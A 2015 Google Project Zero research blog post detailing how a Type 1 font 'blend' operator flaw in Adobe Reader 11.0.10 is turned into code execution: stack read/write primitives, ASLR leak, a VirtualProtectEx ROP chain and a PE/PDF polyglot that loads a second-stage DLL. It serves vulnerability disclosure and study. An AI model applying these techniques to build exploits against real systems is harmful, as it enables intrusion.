Thursday, August 6, 2015

One font vulnerability to rule them all #2: Adobe Reader RCE exploitation

Posted by Mateusz Jurczyk of Google Project Zero

This is part #2 of the “One font vulnerability to rule them all” blog post series. In part #1 (“introducing the BLEND vulnerability”), we discussed how developments in the digital typography field in the last four decades shaped the various font formats in use today, described the two most commonly used PostScript formats (Type 1 and OpenType), outlined the structure of the ATMFD.DLL font program interpreter (shared between many other products) and finally introduced the “blend” operator vulnerability.

Today, we will focus on developing a reliable exploit for Adobe Reader using the security flaw, demonstrating how it could be successfully used to achieve arbitrary code execution within the renderer process, and creating foundations for a full system compromise. Let’s get to work!

Exploitation of Adobe Reader

The overall goal I set for myself when starting to work on the proof of concept was to prepare a PDF file which would pop up calc.exe upon opening in Adobe Reader 11.0.10 (latest affected version) on Windows 8.1 Update 1, both 32-bit and 64-bit. It was supposed to be fully reliable against the specific software build, elevate the Calculator process to high integrity level and/or NT AUTHORITY/SYSTEM security context, and work with all possible exploit mitigations enabled in user and kernel mode. This required a single exploit targeting Adobe Reader and two distinct second-stage exploits for 32-bit and 64-bit Windows kernels.

While in principle the vulnerability may look easy to exploit due to the powerful primitives it provides, the devil is in the details, and there are some details that need to be worked out to construct the PDF exploit described above. First of all, while we can indeed set the “op_sp” pointer well outside the local “op_stk” array and continue Charstring execution, not all operators will work then. Specifically, all operators moving the stack pointer forward (i.e. pushing more data than loading) do check that the pointer does not go out of bounds. This makes our life considerably harder, as we lose access to a number of very useful data writing instructions, the most basic one being the regular numeric instruction, but also “dup”, “pop”, “callgsubr”, “random” and others. An example of the bounds check executed by the “random” instruction is shown below:

case RANDOM:

if(op_sp >=&op_stk_end){

AtmfdDbgPrint("windows\\core\\ntgdi\\fondrv\\otfd\\bc\\t1interp.c",

6015,"stack overflow - otherRANDOM","false");

gotolabel_error;

}

However, among the multitude of supported operators, there are also some which do write to the stack, but do not increase the stack pointer because they also load more or equal amount of data from it. Such operators omit the checks, which is a valid optimization, since if each increase of “op_sp” is (in theory) properly sanitized, the non-increasing instructions can safely assume at any point in time that the pointer is valid. Interestingly, the lack of this safety net makes the vulnerability exploitable.

After inspecting all implemented commands, it turns out that the following stack-writing instructions can still be used with an out-of-bounds “op_sp”:

NOT (Bitwise negation)

NEG (Negation)

ABS (Absolute value)

SQRT (Square root)

INDEX (Get indexed value from stack)

EXCH (Exchange topmost values on stack)

DIV (Division)

ADD (Addition)

SUB (Subtraction)

MUL (Multiplication)

GET (Get value from transient array)

Unfortunately, none of those instructions can be trivially used to write controlled data under the stack pointer. The arithmetic and logic instructions require somewhat controlled operands, but we obviously do not control the memory we want to overwrite (that’s the whole point). Similarly, we cannot use the “index” instruction, as it replaces the top stack item with one x items below the top – and again, we don’t control the x.

The only instruction we are left with is “get”, which replaces a 16-bit index residing under “op_sp” with the corresponding value in the transient array. Since the index value is of limited width, my original idea was to specify a 65535 entry long transient array (via the /lenBuildCharArray field) and insert the desired value into all cells, effectively guaranteeing that regardless of the original value (interpreted as index), the instruction would always write the desired number to the stack. While generally valid, the approach has some significant downsides: it would require a huge overhead of 65 thousands of instructions stored in the file and executed for a single value insertion, and the index number is interpreted as a signed integer, with negative numbers being automatically rejected by the “get” implementation (this could probably be addressed with the “abs” instruction, though).

The general problem here is that we have no idea about the original value on the stack being overwritten. However, if we look again at the above list of allowed operators, we can spot one that significantly reduces the topmost value upon each execution - the “sqrt” instruction! The command treats the 32-bit operand as a 16.16 Fixed value, and replaces it with an approximation of its square root. What’s also important is that the 16-bit integer part of the value overlaps with the 16-bit index used by the “get” instruction. Thanks to all of the above, if we execute the “sqrt” instruction subsequently for 5 times, we can be sure that the 16-bit number under “op_sp” will be one of two values:

0 – if the value was originally zero.

1 – otherwise.

As a result, we have reduced the spectrum of all possible “get” parameters from 65536 to just 2, using only five instructions. Overall, this makes it possible to insert an arbitrary value anywhere on the thread’s stack by first putting it into the transient array under indexes 0 and 1 (with the “put” command), then moving “op_sp” to the desired location using the vulnerable “blend” operator and invoking five “sqrt” instructions followed by a “get”.

The animation below illustrates the full process of writing the number 31337 to a stack location 400 bytes from the beginning of the “op_stk” array:

While writing data to the stack is an important capability, it is as important to be able to read data as well. This is primarily needed to defeat ASLR, which forces us to leak the base address(es) of module(s) in the virtual address space and use them to calculate the locations of ROP gadgets (for the purpose of bypassing DEP). The goal can be accomplished in a similar way, by using the “put” instruction which is a counterpart of “get”, loading data from the stack to the transient array. If we prepend the “put” operator with five “sqrt”s, then the second topmost stack value will be inserted into the transient array at index 0 or 1. In order to deterministically read the value back and operate on it, we first have to pre-initialize both entries with zeros, and after the operation takes place add the values together in order to get the final result.

After the read or write operation is performed somewhere up the stack, it would be also useful to reset “op_sp” back to &op_stk[0], in order to process the newly acquired data or set up the execution context for writing another chunk, without having to worry about the “illegal” commands or destroying parts of the already crafted ROP chain. This is possible with the “setcurrentpoint” instruction, which does exactly that (resets the operand stack pointer back to the beginning of the local stack array) without any side effects.

An example of reading a function pointer from the stack and using it to calculate the base address of an executable image with the above techniques is shown in the animation below:

With the ability to perform arbitrary reads and writes anywhere on the stack using the Charstring program, we now have all the primitives needed to reliably create a ROP chain and achieve arbitrary code execution in the sandboxed process. In accordance to the KISS rule, it would be easiest and most elegant to just perform a single call to the LoadLibrary function, with the path of the exploit PDF file specified in the argument. This should be theoretically possible via a PE + PDF polyglot file, thanks to the fact that the “%PDF” magic bytes don’t have to be present at the very beginning of the file, which would enable us to have both the Adobe Reader exploit and a second-stage DLL written in C/C++ contained within the same file. The feasibility of a PE/PDF polyglot has already been shown by Ange Albertini in his CorkaMIX proof of concept in 2012 [1]. Unfortunately, there are some problems with this idea:

In order to pass a string with the input PDF file path to LoadLibrary, the string or a (potentially relative) pointer to it would have to be present somewhere on the exploited thread’s stack, which - according to our experiments - was unfortunately not the case.

Even if the above was not an issue, Adobe Reader recently began rejecting PDF files starting with the executable “MZ” signature. The reason for this change in behavior is not clear to us, but it would effectively prevent our polyglot from being opened as a document, entirely blocking the attack.

Consequently, we have to settle on a slightly less elegant (yet equally reliable) solution – a standard ROP chain enabling arbitrary code execution by marking the attacker-controlled portions of memory as executable with a VirtualProtect API call, and then jumping to the code. In case of Adobe Reader, this required us to first resolve the address of the “VirtualProtectEx” function using CoolType’s internal implementation of the GetProcAddress routine (first gadget), then call the function with a PAGE_EXECUTE_READWRITE parameter and a pointer to the location on stack where 1st stage payload was set up (second gadget), followed by a return to the now executable shellcode. The final structure of the ROP chain used in the proof of concept exploit is shown in Figure 1.

Even though we have now ended up at an assembly level, it should be still significantly more convenient to proceed with the attack using C/C++ code – while developing a second-stage font related win32k.sys exploit in assembly is definitely possible, it’s also no fun at all. It would be best if we could get a controlled DLL loaded via a LoadLibrary call after all, even if it’s a “deferred” call made by the first stage payload and not directly from the ROP chain. There are two things that play to our advantage here: first of all, the renderer process has an active HANDLE (with read access) to the exploit PDF file at the time of exploitation. Secondly, while filesystem access is largely limited, especially in terms of write capabilities, the renderer still does have write access to a temporary directory at “%APPDATA%\Adobe\Acrobat\11.0”.

In order to take advantage of these conditions, we can create the aforementioned PE/PDF polyglot with a 2nd stage DLL by compiling it in Visual Studio with the /STUB linker option pointing to the PDF file with a valid DOS header prepended. This will result in having the PDF file embedded in the PE file, sufficiently close to the beginning to be correctly opened by Adobe Reader. Due to the program’s behavior, we have to replace the “MZ” signature with some other bytes, such as “mz”. With the above file prepared, we can then perform the following actions in the assembly payload in order to call the DllMain function of the DLL module:

When a path ending with “.pdf” is encountered, we have located the exploit file. Copy it to the temporary directory at %APPDATA%\Adobe\Acrobat\11.0.

Restore the original “MZ” signature to make it a valid PE file again.

Invoke LoadLibrary over the new file, having our C++ DllMain function called.

As a result, we now have the ability to carry out the remainder of the attack using a high level programming language. An example of displaying a message box dialog in the DllMain function in shown in Figure 3.

Figure 3. Working arbitrary C++ code in the DllMain function of the 2nd stage DLL.

At this point, we have a PDF file reliably executing arbitrary C++ code in the context of any Adobe Reader 11.0.10 installation. We can now proceed to developing a kernel attack in order to escape the sandbox – in this case, however, we do have to differentiate between x86 and x64 platforms, as different exploits will have to be used. The necessary information regarding system bitness can be obtained with an IsWow64Process API call.

In the next post, we will discuss how the vulnerable code paths in ATMFD.DLL could be reached from the context of a restricted Adobe Reader process, in order to repeat the exploitation of the BLEND vulnerability and elevate our privileges in the operating system.